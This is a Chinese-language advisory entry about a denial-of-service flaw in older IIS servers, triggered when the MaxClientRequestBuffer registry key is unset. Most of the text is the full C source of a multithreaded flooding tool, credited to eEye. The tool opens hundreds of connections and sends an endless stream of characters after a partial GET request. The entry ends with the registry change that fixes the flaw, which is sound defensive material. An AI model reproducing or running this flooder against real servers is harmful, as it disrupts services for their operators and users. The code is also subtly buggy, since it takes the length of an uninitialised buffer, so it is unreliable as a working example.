17 IIS web server DOS

　　漏洞描述：

　　默认情况下，IIS容易被拒绝服务攻击。如果注册表中有一个叫 "MaxClientRequestBuffer" 的键未被创建，针对这种NT系

统的攻击通常能奏效。 "MaxClientRequestBuffer" 这个键用于设置IIS允许接受的输入量。如果 "MaxClientRequestBuffer"

设置为256(bytes)，则攻击者通过输入大量的字符请求IIS将被限制在256字节以内。而系统的缺省设置对此不加限制，因此，利用

下面的程序。可以很容易地对IIS server实行DOS攻击：

#include

#include

#define MAX_THREAD 666

void cng();

char *server;

char *buffer;

int port;

int counter = 0;

int current_threads = 0;

int main(int argc, char **argv)

{

WORD tequila;

WSADATA data;

int p;

DWORD tid;

HANDLE hThread[2000];

//This code is as is and sucks as it is. Won't exit correctly and a lot

of other fun things.

//That I didn't want to take the time to do. So just ctrl+c out of the

code.

//Load up cnghack.exe 3 times for charm.

printf("CNG IIS DoS.\nMarc@eEye.com\nhttp://www.eeye.com\n\"For my

beloved.\"\n");

if(argc<2){

printf("Usage: %s [server] [port]\n",argv[0]);

exit(1);

}

buffer=malloc(17500);

memset( buffer, 'A', strlen(buffer));

server=argv[1];

port=atoi(argv[2]);

tequila = MAKEWORD( 1, 1 );

printf("Attempting to start winsock... ");

if( (WSAStartup(tequila, &data)) !=0 ){

printf("failed to start winsock.\n");

exit(1);

}

else{

printf("started winsock.\n\n");

}

counter = 0;

for(p = 0 ; p < MAX_THREAD ; ++p ){

hThread[counter] = CreateThread(0,

0,

(LPTHREAD_START_ROUTINE) cng,

( void * )++counter,

0,

&tid);

}

Sleep(250);

while( current_threads )

Sleep(250);

counter = 0;

printf("Terminated Threads.\n");

while (counter < MAX_THREAD)

{

TerminateThread( hThread[counter], 0 );

++counter;

}

WSACleanup();

return 0;

}

void cng()

{

int SockFD=0, p;

struct sockaddr_in DstSAin;

char GETKILLED[]="GET / HTTP/\r\n";

int die=1;

printf("Entered CNG\n");

++current_threads;

DstSAin.sin_family = AF_INET;

DstSAin.sin_port = htons((u_short)port);

DstSAin.sin_addr.s_addr=inet_addr( server );

if((SockFD = socket(AF_INET, SOCK_STREAM, 0)) < 0){

printf("Failed to create socket\n");

--current_threads;

return;

}

if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))

{

p=send(SockFD,GETKILLED,strlen(GETKILLED),0);

printf("Step 1: %i\n", p);

for(;;){

p=send(SockFD,buffer,strlen(buffer),0);

printf("P: %i\n", p);

//put in some code to check if send = -1 more then X times we drop

the loop and exit the thread

//bla bla bla i love the dirtiness of concept code.

}

}

--current_threads;

printf("Exited CNG\n");

return;

}

cnghack.c works by doing the following:

Connects to example.com

Sends: GET / HTTP/[return][buffer]

Where:

[return] is just an \r\n

[buffer] is a never ending stream of A's

　　攻击结果将导致NT系统的CPU占用率达到 100%

　　解决方案

　　运行Regedt32.exe

在：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters

增加一个值：

Value Name: MaxClientRequestBuffer

Data Type: REG_DWORD

　　设置为十进制

　　具体数值设置为你想设定的IIS允许接受的URL最大长度。

　　CNNS的设置为256